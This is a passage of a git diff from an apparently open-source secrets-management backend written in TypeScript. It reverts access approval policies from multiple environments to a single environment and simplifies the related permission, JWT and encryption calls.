         `${TableName.AccessApprovalPolicy}.id`,
@@ -436,7 +404,7 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
       .select(tx.ref("bypasserGroupId").withSchema(TableName.AccessApprovalPolicyBypasser))
       .select(tx.ref("name").withSchema(TableName.Environment).as("envName"))
       .select(tx.ref("slug").withSchema(TableName.Environment).as("envSlug"))
-      .select(tx.ref("id").withSchema(TableName.Environment).as("environmentId"))
+      .select(tx.ref("id").withSchema(TableName.Environment).as("envId"))
       .select(tx.ref("projectId").withSchema(TableName.Environment))
       .select(selectAllTableCols(TableName.AccessApprovalPolicy));
 
@@ -480,15 +448,6 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
               sequence: approverSequence,
               approvalsRequired
             })
-          },
-          {
-            key: "environmentId",
-            label: "environments" as const,
-            mapper: ({ environmentId: id, envName, envSlug }) => ({
-              id,
-              name: envName,
-              slug: envSlug
-            })
           }
         ]
       });
@@ -511,6 +470,11 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
         data: docs,
         key: "id",
         parentMapper: (data) => ({
+          environment: {
+            id: data.envId,
+            name: data.envName,
+            slug: data.envSlug
+          },
           projectId: data.projectId,
           ...AccessApprovalPoliciesSchema.parse(data)
           // secretPath: data.secretPath || undefined,
@@ -553,15 +517,6 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
               id,
               type: BypasserType.Group as const
             })
-          },
-          {
-            key: "environmentId",
-            label: "environments" as const,
-            mapper: ({ environmentId: id, envName, envSlug }) => ({
-              id,
-              name: envName,
-              slug: envSlug
-            })
           }
         ]
       });
@@ -590,20 +545,14 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
           // eslint-disable-next-line @typescript-eslint/no-misused-promises
           buildFindFilter(
             {
+              envId,
               secretPath
             },
             TableName.AccessApprovalPolicy
           )
         )
-        .join(
-          TableName.AccessApprovalPolicyEnvironment,
-          `${TableName.AccessApprovalPolicyEnvironment}.policyId`,
-          `${TableName.AccessApprovalPolicy}.id`
-        )
-        .where(`${TableName.AccessApprovalPolicyEnvironment}.envId`, "=", envId)
         .orderBy("deletedAt", "desc")
         .orderByRaw(`"deletedAt" IS NULL`)
-        .select(selectAllTableCols(TableName.AccessApprovalPolicy))
         .first();
 
       return result;
@@ -612,81 +561,5 @@ export const accessApprovalPolicyDALFactory = (db: TDbClient): TAccessApprovalPo
     }
   };
 
-  const findPolicyByEnvIdAndSecretPath: TAccessApprovalPolicyDALFactory["findPolicyByEnvIdAndSecretPath"] = async (
-    { envIds, secretPath },
-    tx
-  ) => {
-    try {
-      const docs = await (tx || db.replicaNode())(TableName.AccessApprovalPolicy)
-        .join(
-          TableName.AccessApprovalPolicyEnvironment,
-          `${TableName.AccessApprovalPolicyEnvironment}.policyId`,
-          `${TableName.AccessApprovalPolicy}.id`
-        )
-        .join(
-          TableName.Environment,
-          `${TableName.AccessApprovalPolicyEnvironment}.envId`,
-          `${TableName.Environment}.id`
-        )
-        .where(
-          // eslint-disable-next-line @typescript-eslint/no-misused-promises
-          buildFindFilter(
-            {
-              $in: {
-                envId: envIds
-              }
-            },
-            TableName.AccessApprovalPolicyEnvironment
-          )
-        )
-        .where(
-          // eslint-disable-next-line @typescript-eslint/no-misused-promises
-          buildFindFilter(
-            {
-              secretPath
-            },
-            TableName.AccessApprovalPolicy
-          )
-        )
-        .whereNull(`${TableName.AccessApprovalPolicy}.deletedAt`)
-        .orderBy("deletedAt", "desc")
-        .orderByRaw(`"deletedAt" IS NULL`)
-        .select(selectAllTableCols(TableName.AccessApprovalPolicy))
-        .select(db.ref("name").withSchema(TableName.Environment).as("envName"))
-        .select(db.ref("slug").withSchema(TableName.Environment).as("envSlug"))
-        .select(db.ref("id").withSchema(TableName.Environment).as("environmentId"))
-        .select(db.ref("projectId").withSchema(TableName.Environment));
-      const formattedDocs = sqlNestRelationships({
-        data: docs,
-        key: "id",
-        parentMapper: (data) => ({
-          projectId: data.projectId,
-          ...AccessApprovalPoliciesSchema.parse(data)
-        }),
-        childrenMapper: [
-          {
-            key: "environmentId",
-            label: "environments" as const,
-            mapper: ({ environmentId: id, envName, envSlug }) => ({
-              id,
-              name: envName,
-              slug: envSlug
-            })
-          }
-        ]
-      });
-      return formattedDocs?.[0];
-    } catch (error) {
-      throw new DatabaseError({ error, name: "findPolicyByEnvIdAndSecretPath" });
-    }
-  };
-
-  return {
-    ...accessApprovalPolicyOrm,
-    find,
-    findById,
-    softDeleteById,
-    findLastValidPolicy,
-    findPolicyByEnvIdAndSecretPath
-  };
+  return { ...accessApprovalPolicyOrm, find, findById, softDeleteById, findLastValidPolicy };
 };

backend/src/ee/services/access-approval-policy/access-approval-policy-environment-dal.ts

@@ -1,32 +0,0 @@
-import { Knex } from "knex";
-
-import { TDbClient } from "@app/db";
-import { TableName } from "@app/db/schemas";
-import { DatabaseError } from "@app/lib/errors";
-import { buildFindFilter, ormify, selectAllTableCols } from "@app/lib/knex";
-
-export type TAccessApprovalPolicyEnvironmentDALFactory = ReturnType<typeof accessApprovalPolicyEnvironmentDALFactory>;
-
-export const accessApprovalPolicyEnvironmentDALFactory = (db: TDbClient) => {
-  const accessApprovalPolicyEnvironmentOrm = ormify(db, TableName.AccessApprovalPolicyEnvironment);
-
-  const findAvailablePoliciesByEnvId = async (envId: string, tx?: Knex) => {
-    try {
-      const docs = await (tx || db.replicaNode())(TableName.AccessApprovalPolicyEnvironment)
-        .join(
-          TableName.AccessApprovalPolicy,
-          `${TableName.AccessApprovalPolicyEnvironment}.policyId`,
-          `${TableName.AccessApprovalPolicy}.id`
-        )
-        // eslint-disable-next-line @typescript-eslint/no-misused-promises
-        .where(buildFindFilter({ envId }, TableName.AccessApprovalPolicyEnvironment))
-        .whereNull(`${TableName.AccessApprovalPolicy}.deletedAt`)
-        .select(selectAllTableCols(TableName.AccessApprovalPolicyEnvironment));
-      return docs;
-    } catch (error) {
-      throw new DatabaseError({ error, name: "findAvailablePoliciesByEnvId" });
-    }
-  };
-
-  return { ...accessApprovalPolicyEnvironmentOrm, findAvailablePoliciesByEnvId };
-};

backend/src/ee/services/access-approval-policy/access-approval-policy-service.ts

@@ -1,6 +1,5 @@
 import { ForbiddenError } from "@casl/ability";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
@@ -21,7 +20,6 @@ import {
   TAccessApprovalPolicyBypasserDALFactory
 } from "./access-approval-policy-approver-dal";
 import { TAccessApprovalPolicyDALFactory } from "./access-approval-policy-dal";
-import { TAccessApprovalPolicyEnvironmentDALFactory } from "./access-approval-policy-environment-dal";
 import {
   ApproverType,
   BypasserType,
@@ -46,14 +44,12 @@ type TAccessApprovalPolicyServiceFactoryDep = {
   additionalPrivilegeDAL: Pick<TProjectUserAdditionalPrivilegeDALFactory, "delete">;
   accessApprovalRequestReviewerDAL: Pick<TAccessApprovalRequestReviewerDALFactory, "update" | "delete">;
   orgMembershipDAL: Pick<TOrgMembershipDALFactory, "find">;
-  accessApprovalPolicyEnvironmentDAL: TAccessApprovalPolicyEnvironmentDALFactory;
 };
 
 export const accessApprovalPolicyServiceFactory = ({
   accessApprovalPolicyDAL,
   accessApprovalPolicyApproverDAL,
   accessApprovalPolicyBypasserDAL,
-  accessApprovalPolicyEnvironmentDAL,
   groupDAL,
   permissionService,
   projectEnvDAL,
@@ -64,27 +60,6 @@ export const accessApprovalPolicyServiceFactory = ({
   accessApprovalRequestReviewerDAL,
   orgMembershipDAL
 }: TAccessApprovalPolicyServiceFactoryDep): TAccessApprovalPolicyServiceFactory => {
-  const $policyExists = async ({
-    envId,
-    envIds,
-    secretPath,
-    policyId
-  }: {
-    envId?: string;
-    envIds?: string[];
-    secretPath: string;
-    policyId?: string;
-  }) => {
-    if (!envId && !envIds) {
-      throw new BadRequestError({ message: "Must provide either envId or envIds" });
-    }
-    const policy = await accessApprovalPolicyDAL.findPolicyByEnvIdAndSecretPath({
-      secretPath,
-      envIds: envId ? [envId] : (envIds as string[])
-    });
-    return policyId ? policy && policy.id !== policyId : Boolean(policy);
-  };
-
   const createAccessApprovalPolicy: TAccessApprovalPolicyServiceFactory["createAccessApprovalPolicy"] = async ({
     name,
     actor,
@@ -97,7 +72,6 @@ export const accessApprovalPolicyServiceFactory = ({
     bypassers,
     projectSlug,
     environment,
-    environments,
     enforcementLevel,
     allowedSelfApprovals,
     approvalsRequired
@@ -122,32 +96,15 @@ export const accessApprovalPolicyServiceFactory = ({
       actorId,
       projectId: project.id,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionActions.Create,
       ProjectPermissionSub.SecretApproval
     );
-    const mergedEnvs = (environment ? [environment] : environments) || [];
-    if (mergedEnvs.length === 0) {
-      throw new BadRequestError({ message: "Must provide either environment or environments" });
-    }
-    const envs = await projectEnvDAL.find({ $in: { slug: mergedEnvs }, projectId: project.id });
-    if (!envs.length || envs.length !== mergedEnvs.length) {
-      const notFoundEnvs = mergedEnvs.filter((env) => !envs.find((el) => el.slug === env));
-      throw new NotFoundError({ message: `One or more environments not found: ${notFoundEnvs.join(", ")}` });
-    }
-
-    for (const env of envs) {
-      // eslint-disable-next-line no-await-in-loop
-      if (await $policyExists({ envId: env.id, secretPath })) {
-        throw new BadRequestError({
-          message: `A policy for secret path '${secretPath}' already exists in environment '${env.slug}'`
-        });
-      }
-    }
+    const env = await projectEnvDAL.findOne({ slug: environment, projectId: project.id });
+    if (!env) throw new NotFoundError({ message: `Environment with slug '${environment}' not found` });
 
     let approverUserIds = userApprovers;
     if (userApproverNames.length) {
@@ -214,7 +171,7 @@ export const accessApprovalPolicyServiceFactory = ({
     const accessApproval = await accessApprovalPolicyDAL.transaction(async (tx) => {
       const doc = await accessApprovalPolicyDAL.create(
         {
-          envId: envs[0].id,
+          envId: env.id,
           approvals,
           secretPath,
           name,
@@ -223,10 +180,6 @@ export const accessApprovalPolicyServiceFactory = ({
         },
         tx
       );
-      await accessApprovalPolicyEnvironmentDAL.insertMany(
-        envs.map((el) => ({ policyId: doc.id, envId: el.id })),
-        tx
-      );
 
       if (approverUserIds.length) {
         await accessApprovalPolicyApproverDAL.insertMany(
@@ -279,7 +232,7 @@ export const accessApprovalPolicyServiceFactory = ({
       return doc;
     });
 
-    return { ...accessApproval, environments: envs, projectId: project.id, environment: envs[0] };
+    return { ...accessApproval, environment: env, projectId: project.id };
   };
 
   const getAccessApprovalPolicyByProjectSlug: TAccessApprovalPolicyServiceFactory["getAccessApprovalPolicyByProjectSlug"] =
@@ -293,15 +246,11 @@ export const accessApprovalPolicyServiceFactory = ({
         actorId,
         projectId: project.id,
         actorAuthMethod,
-        actorOrgId,
-        actionProjectType: ActionProjectType.SecretManager
+        actorOrgId
       });
 
       const accessApprovalPolicies = await accessApprovalPolicyDAL.find({ projectId: project.id, deletedAt: null });
-      return accessApprovalPolicies.map((policy) => ({
-        ...policy,
-        environment: policy.environments[0]
-      }));
+      return accessApprovalPolicies;
     };
 
   const updateAccessApprovalPolicy: TAccessApprovalPolicyServiceFactory["updateAccessApprovalPolicy"] = async ({
@@ -317,8 +266,7 @@ export const accessApprovalPolicyServiceFactory = ({
     approvals,
     enforcementLevel,
     allowedSelfApprovals,
-    approvalsRequired,
-    environments
+    approvalsRequired
   }: TUpdateAccessApprovalPolicy) => {
     const groupApprovers = approvers.filter((approver) => approver.type === ApproverType.Group);
 
@@ -331,11 +279,7 @@ export const accessApprovalPolicyServiceFactory = ({
     ) as { username: string; sequence?: number }[];
 
     const accessApprovalPolicy = await accessApprovalPolicyDAL.findById(policyId);
-    if (!accessApprovalPolicy) {
-      throw new NotFoundError({
-        message: `Access approval policy with ID '${policyId}' not found`
-      });
-    }
+    if (!accessApprovalPolicy) throw new BadRequestError({ message: "Approval policy not found" });
 
     const currentApprovals = approvals || accessApprovalPolicy.approvals;
     if (
@@ -346,36 +290,15 @@ export const accessApprovalPolicyServiceFactory = ({
       throw new BadRequestError({ message: "Approvals cannot be greater than approvers" });
     }
 
-    let envs = accessApprovalPolicy.environments;
-    if (
-      environments &&
-      (environments.length !== envs.length || environments.some((env) => !envs.find((el) => el.slug === env)))
-    ) {
-      envs = await projectEnvDAL.find({ $in: { slug: environments }, projectId: accessApprovalPolicy.projectId });
+    if (!accessApprovalPolicy) {
+      throw new NotFoundError({ message: `Secret approval policy with ID '${policyId}' not found` });
     }
-
-    for (const env of envs) {
-      if (
-        // eslint-disable-next-line no-await-in-loop
-        await $policyExists({
-          envId: env.id,
-          secretPath: secretPath || accessApprovalPolicy.secretPath,
-          policyId: accessApprovalPolicy.id
-        })
-      ) {
-        throw new BadRequestError({
-          message: `A policy for secret path '${secretPath || accessApprovalPolicy.secretPath}' already exists in environment '${env.slug}'`
-        });
-      }
-    }
-
     const { permission } = await permissionService.getProjectPermission({
       actor,
       actorId,
       projectId: accessApprovalPolicy.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Edit, ProjectPermissionSub.SecretApproval);
@@ -522,14 +445,6 @@ export const accessApprovalPolicyServiceFactory = ({
         );
       }
 
-      if (environments) {
-        await accessApprovalPolicyEnvironmentDAL.delete({ policyId: doc.id }, tx);
-        await accessApprovalPolicyEnvironmentDAL.insertMany(
-          envs.map((env) => ({ policyId: doc.id, envId: env.id })),
-          tx
-        );
-      }
-
       await accessApprovalPolicyBypasserDAL.delete({ policyId: doc.id }, tx);
 
       if (bypasserUserIds.length) {
@@ -559,8 +474,7 @@ export const accessApprovalPolicyServiceFactory = ({
 
     return {
       ...updatedPolicy,
-      environments: accessApprovalPolicy.environments,
-      environment: accessApprovalPolicy.environments[0],
+      environment: accessApprovalPolicy.environment,
       projectId: accessApprovalPolicy.projectId
     };
   };
@@ -580,8 +494,7 @@ export const accessApprovalPolicyServiceFactory = ({
       actorId,
       projectId: policy.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
     ForbiddenError.from(permission).throwUnlessCan(
       ProjectPermissionActions.Delete,
@@ -611,10 +524,7 @@ export const accessApprovalPolicyServiceFactory = ({
       }
     });
 
-    return {
-      ...policy,
-      environment: policy.environments[0]
-    };
+    return policy;
   };
 
   const getAccessPolicyCountByEnvSlug: TAccessApprovalPolicyServiceFactory["getAccessPolicyCountByEnvSlug"] = async ({
@@ -634,8 +544,7 @@ export const accessApprovalPolicyServiceFactory = ({
       actorId,
       projectId: project.id,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
     if (!membership) {
       throw new ForbiddenRequestError({ message: "You are not a member of this project" });
@@ -644,13 +553,11 @@ export const accessApprovalPolicyServiceFactory = ({
     const environment = await projectEnvDAL.findOne({ projectId: project.id, slug: envSlug });
     if (!environment) throw new NotFoundError({ message: `Environment with slug '${envSlug}' not found` });
 
-    const policies = await accessApprovalPolicyDAL.find(
-      {
-        projectId: project.id,
-        deletedAt: null
-      },
-      { envId: environment.id }
-    );
+    const policies = await accessApprovalPolicyDAL.find({
+      envId: environment.id,
+      projectId: project.id,
+      deletedAt: null
+    });
     if (!policies) throw new NotFoundError({ message: `No policies found in environment with slug '${envSlug}'` });
 
     return { count: policies.length };
@@ -676,16 +583,12 @@ export const accessApprovalPolicyServiceFactory = ({
       actorId,
       projectId: policy.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionActions.Read, ProjectPermissionSub.SecretApproval);
 
-    return {
-      ...policy,
-      environment: policy.environments[0]
-    };
+    return policy;
   };
 
   return {

backend/src/ee/services/access-approval-policy/access-approval-policy-types.ts

@@ -26,8 +26,7 @@ export enum BypasserType {
 export type TCreateAccessApprovalPolicy = {
   approvals: number;
   secretPath: string;
-  environment?: string;
-  environments?: string[];
+  environment: string;
   approvers: (
     | { type: ApproverType.Group; id: string; sequence?: number }
     | { type: ApproverType.User; id?: string; username?: string; sequence?: number }
@@ -59,7 +58,6 @@ export type TUpdateAccessApprovalPolicy = {
   enforcementLevel?: EnforcementLevel;
   allowedSelfApprovals: boolean;
   approvalsRequired?: { numberOfApprovals: number; stepNumber: number }[];
-  environments?: string[];
 } & Omit<TProjectPermission, "projectId">;
 
 export type TDeleteAccessApprovalPolicy = {
@@ -115,15 +113,6 @@ export interface TAccessApprovalPolicyServiceFactory {
       slug: string;
       position: number;
     };
-    environments: {
-      name: string;
-      id: string;
-      createdAt: Date;
-      updatedAt: Date;
-      projectId: string;
-      slug: string;
-      position: number;
-    }[];
     projectId: string;
     name: string;
     id: string;
@@ -133,7 +122,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
   }>;
   deleteAccessApprovalPolicy: ({
@@ -157,18 +146,13 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;
       name: string;
       slug: string;
     };
-    environments: {
-      id: string;
-      name: string;
-      slug: string;
-    }[];
     projectId: string;
   }>;
   updateAccessApprovalPolicy: ({
@@ -184,19 +168,13 @@ export interface TAccessApprovalPolicyServiceFactory {
     approvals,
     enforcementLevel,
     allowedSelfApprovals,
-    approvalsRequired,
-    environments
+    approvalsRequired
   }: TUpdateAccessApprovalPolicy) => Promise<{
     environment: {
       id: string;
       name: string;
       slug: string;
     };
-    environments: {
-      id: string;
-      name: string;
-      slug: string;
-    }[];
     projectId: string;
     name: string;
     id: string;
@@ -240,18 +218,13 @@ export interface TAccessApprovalPolicyServiceFactory {
       envId: string;
       enforcementLevel: string;
       allowedSelfApprovals: boolean;
-      secretPath: string;
+      secretPath?: string | null | undefined;
       deletedAt?: Date | null | undefined;
       environment: {
         id: string;
         name: string;
         slug: string;
       };
-      environments: {
-        id: string;
-        name: string;
-        slug: string;
-      }[];
       projectId: string;
       bypassers: (
         | {
@@ -296,18 +269,13 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath: string;
+    secretPath?: string | null | undefined;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;
       name: string;
       slug: string;
     };
-    environments: {
-      id: string;
-      name: string;
-      slug: string;
-    }[];
     projectId: string;
     bypassers: (
       | {

backend/src/ee/services/access-approval-request/access-approval-request-dal.ts

@@ -65,7 +65,7 @@ export interface TAccessApprovalRequestDALFactory extends Omit<TOrmify<TableName
           deletedAt: Date | null | undefined;
         };
         projectId: string;
-        environments: string[];
+        environment: string;
         requestedByUser: {
           userId: string;
           email: string | null | undefined;
@@ -515,17 +515,7 @@ export const accessApprovalRequestDALFactory = (db: TDbClient): TAccessApprovalR
         `accessApprovalReviewerUser.id`
       )
 
-      .leftJoin(
-        TableName.AccessApprovalPolicyEnvironment,
-        `${TableName.AccessApprovalPolicy}.id`,
-        `${TableName.AccessApprovalPolicyEnvironment}.policyId`
-      )
-
-      .leftJoin(
-        TableName.Environment,
-        `${TableName.AccessApprovalPolicyEnvironment}.envId`,
-        `${TableName.Environment}.id`
-      )
+      .leftJoin(TableName.Environment, `${TableName.AccessApprovalPolicy}.envId`, `${TableName.Environment}.id`)
       .select(selectAllTableCols(TableName.AccessApprovalRequest))
       .select(
         tx.ref("approverUserId").withSchema(TableName.AccessApprovalPolicyApprover),
@@ -693,11 +683,6 @@ export const accessApprovalRequestDALFactory = (db: TDbClient): TAccessApprovalR
               lastName,
               username
             })
-          },
-          {
-            key: "environment",
-            label: "environments" as const,
-            mapper: ({ environment }) => environment
           }
         ]
       });

backend/src/ee/services/access-approval-request/access-approval-request-service.ts

@@ -1,7 +1,7 @@
 import slugify from "@sindresorhus/slugify";
 import msFn from "ms";
 
-import { ActionProjectType, ProjectMembershipRole } from "@app/db/schemas";
+import { ProjectMembershipRole } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { groupBy } from "@app/lib/fn";
@@ -86,25 +86,6 @@ export const accessApprovalRequestServiceFactory = ({
   projectMicrosoftTeamsConfigDAL,
   projectSlackConfigDAL
 }: TSecretApprovalRequestServiceFactoryDep): TAccessApprovalRequestServiceFactory => {
-  const $getEnvironmentFromPermissions = (permissions: unknown): string | null => {
-    if (!Array.isArray(permissions) || permissions.length === 0) {
-      return null;
-    }
-
-    const firstPermission = permissions[0] as unknown[];
-    if (!Array.isArray(firstPermission) || firstPermission.length < 3) {
-      return null;
-    }
-
-    const metadata = firstPermission[2] as Record<string, unknown>;
-    if (typeof metadata === "object" && metadata !== null && "environment" in metadata) {
-      const env = metadata.environment;
-      return typeof env === "string" ? env : null;
-    }
-
-    return null;
-  };
-
   const createAccessApprovalRequest: TAccessApprovalRequestServiceFactory["createAccessApprovalRequest"] = async ({
     isTemporary,
     temporaryRange,
@@ -126,8 +107,7 @@ export const accessApprovalRequestServiceFactory = ({
       actorId,
       projectId: project.id,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
     if (!membership) {
       throw new ForbiddenRequestError({ message: "You are not a member of this project" });
@@ -236,7 +216,7 @@ export const accessApprovalRequestServiceFactory = ({
       );
 
       const requesterFullName = `${requestedByUser.firstName} ${requestedByUser.lastName}`;
-      const approvalUrl = `${cfg.SITE_URL}/projects/secret-management/${project.id}/approval`;
+      const approvalUrl = `${cfg.SITE_URL}/projects/${project.id}/secret-manager/approval`;
 
       await triggerWorkflowIntegrationNotification({
         input: {
@@ -309,8 +289,7 @@ export const accessApprovalRequestServiceFactory = ({
       actorId,
       projectId: project.id,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
     if (!membership) {
       throw new ForbiddenRequestError({ message: "You are not a member of this project" });
@@ -327,15 +306,6 @@ export const accessApprovalRequestServiceFactory = ({
       requests = requests.filter((request) => request.environment === envSlug);
     }
 
-    requests = requests.map((request) => {
-      const permissionEnvironment = $getEnvironmentFromPermissions(request.permissions);
-
-      if (permissionEnvironment) {
-        request.environmentName = permissionEnvironment;
-      }
-      return request;
-    });
-
     return { requests };
   };
 
@@ -353,34 +323,19 @@ export const accessApprovalRequestServiceFactory = ({
       throw new NotFoundError({ message: `Secret approval request with ID '${requestId}' not found` });
     }
 
-    const { policy, environments, permissions } = accessApprovalRequest;
+    const { policy, environment } = accessApprovalRequest;
     if (policy.deletedAt) {
       throw new BadRequestError({
         message: "The policy associated with this access request has been deleted."
       });
     }
 
-    const permissionEnvironment = $getEnvironmentFromPermissions(permissions);
-    if (
-      !permissionEnvironment ||
-      (!environments.includes(permissionEnvironment) && status === ApprovalStatus.APPROVED)
-    ) {
-      throw new BadRequestError({
-        message: `The original policy ${policy.name} is not attached to environment '${permissionEnvironment}'.`
-      });
-    }
-    const environment = await projectEnvDAL.findOne({
-      projectId: accessApprovalRequest.projectId,
-      slug: permissionEnvironment
-    });
-
     const { membership, hasRole } = await permissionService.getProjectPermission({
       actor,
       actorId,
       projectId: accessApprovalRequest.projectId,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
 
     if (!membership) {
@@ -399,17 +354,11 @@ export const accessApprovalRequestServiceFactory = ({
       status === ApprovalStatus.APPROVED;
 
     const isApprover = policy.approvers.find((approver) => approver.userId === actorId);
-
-    const isSelfRejection = isSelfApproval && status === ApprovalStatus.REJECTED;
-
-    // users can always reject (cancel) their own requests
-    if (!isSelfRejection) {
-      // If user is (not an approver OR cant self approve) AND can't bypass policy
-      if ((!isApprover || (!policy.allowedSelfApprovals && isSelfApproval)) && cannotBypassUnderSoftEnforcement) {
-        throw new BadRequestError({
-          message: "Failed to review access approval request. Users are not authorized to review their own request."
-        });
-      }
+    // If user is (not an approver OR cant self approve) AND can't bypass policy
+    if ((!isApprover || (!policy.allowedSelfApprovals && isSelfApproval)) && cannotBypassUnderSoftEnforcement) {
+      throw new BadRequestError({
+        message: "Failed to review access approval request. Users are not authorized to review their own request."
+      });
     }
 
     if (
@@ -465,7 +414,7 @@ export const accessApprovalRequestServiceFactory = ({
       );
 
       // Only throw if actor is not the approver and not bypassing
-      if (!isApproverOfTheSequence && !isBreakGlassApprovalAttempt && !isSelfRejection) {
+      if (!isApproverOfTheSequence && !isBreakGlassApprovalAttempt) {
         throw new BadRequestError({ message: "You are not a reviewer in this step" });
       }
     }
@@ -595,8 +544,8 @@ export const accessApprovalRequestServiceFactory = ({
                   requesterEmail: actingUser.email,
                   bypassReason: bypassReason || "No reason provided",
                   secretPath: policy.secretPath || "/",
-                  environment: environment?.name || permissionEnvironment,
-                  approvalUrl: `${cfg.SITE_URL}/projects/secret-management/${project.id}/approval`,
+                  environment,
+                  approvalUrl: `${cfg.SITE_URL}/projects/${project.id}/secret-manager/approval`,
                   requestType: "access"
                 },
                 template: SmtpTemplates.AccessSecretRequestBypassed
@@ -627,8 +576,7 @@ export const accessApprovalRequestServiceFactory = ({
       actorId,
       projectId: project.id,
       actorAuthMethod,
-      actorOrgId,
-      actionProjectType: ActionProjectType.SecretManager
+      actorOrgId
     });
     if (!membership) {
       throw new ForbiddenRequestError({ message: "You are not a member of this project" });

backend/src/ee/services/app-connections/oracledb/oracledb-connection-schemas.ts

@@ -45,10 +45,7 @@ export const ValidateOracleDBConnectionCredentialsSchema = z.discriminatedUnion(
 ]);
 
 export const CreateOracleDBConnectionSchema = ValidateOracleDBConnectionCredentialsSchema.and(
-  GenericCreateAppConnectionFieldsSchema(AppConnection.OracleDB, {
-    supportsPlatformManagedCredentials: true,
-    supportsGateways: true
-  })
+  GenericCreateAppConnectionFieldsSchema(AppConnection.OracleDB, { supportsPlatformManagedCredentials: true })
 );
 
 export const UpdateOracleDBConnectionSchema = z
@@ -57,12 +54,7 @@ export const UpdateOracleDBConnectionSchema = z
       AppConnections.UPDATE(AppConnection.OracleDB).credentials
     )
   })
-  .and(
-    GenericUpdateAppConnectionFieldsSchema(AppConnection.OracleDB, {
-      supportsPlatformManagedCredentials: true,
-      supportsGateways: true
-    })
-  );
+  .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.OracleDB, { supportsPlatformManagedCredentials: true }));
 
 export const OracleDBConnectionListItemSchema = z.object({
   name: z.literal("OracleDB"),

backend/src/ee/services/assume-privilege/assume-privilege-service.ts

@@ -1,8 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
+import jwt from "jsonwebtoken";
 
-import { ActionProjectType } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
-import { crypto } from "@app/lib/crypto/cryptography";
 import { ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { ActorType } from "@app/services/auth/auth-type";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@@ -38,8 +37,7 @@ export const assumePrivilegeServiceFactory = ({
       actorId: actorPermissionDetails.id,
       projectId,
       actorAuthMethod: actorPermissionDetails.authMethod,
-      actorOrgId: actorPermissionDetails.orgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId: actorPermissionDetails.orgId
     });
 
     if (targetActorType === ActorType.USER) {
@@ -60,12 +58,11 @@ export const assumePrivilegeServiceFactory = ({
       actorId: targetActorId,
       projectId,
       actorAuthMethod: actorPermissionDetails.authMethod,
-      actorOrgId: actorPermissionDetails.orgId,
-      actionProjectType: ActionProjectType.Any
+      actorOrgId: actorPermissionDetails.orgId
     });
 
     const appCfg = getConfig();
-    const assumePrivilegesToken = crypto.jwt().sign(
+    const assumePrivilegesToken = jwt.sign(
       {
         tokenVersionId,
         actorType: targetActorType,
@@ -85,7 +82,7 @@ export const assumePrivilegeServiceFactory = ({
     tokenVersionId
   ) => {
     const appCfg = getConfig();
-    const decodedToken = crypto.jwt().verify(token, appCfg.AUTH_SECRET) as {
+    const decodedToken = jwt.verify(token, appCfg.AUTH_SECRET) as {
       tokenVersionId: string;
       projectId: string;
       requesterId: string;

backend/src/ee/services/audit-log-stream/audit-log-stream-service.ts

@@ -4,7 +4,7 @@ import { RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { crypto } from "@app/lib/crypto/cryptography";
+import { infisicalSymmetricDecrypt, infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
 import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors";
 import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator";
 
@@ -86,10 +86,7 @@ export const auditLogStreamServiceFactory = ({
       .catch((err) => {
         throw new BadRequestError({ message: `Failed to connect with upstream source: ${(err as Error)?.message}` });
       });
-
-    const encryptedHeaders = headers
-      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
-      : undefined;
+    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
     const logStream = await auditLogStreamDAL.create({
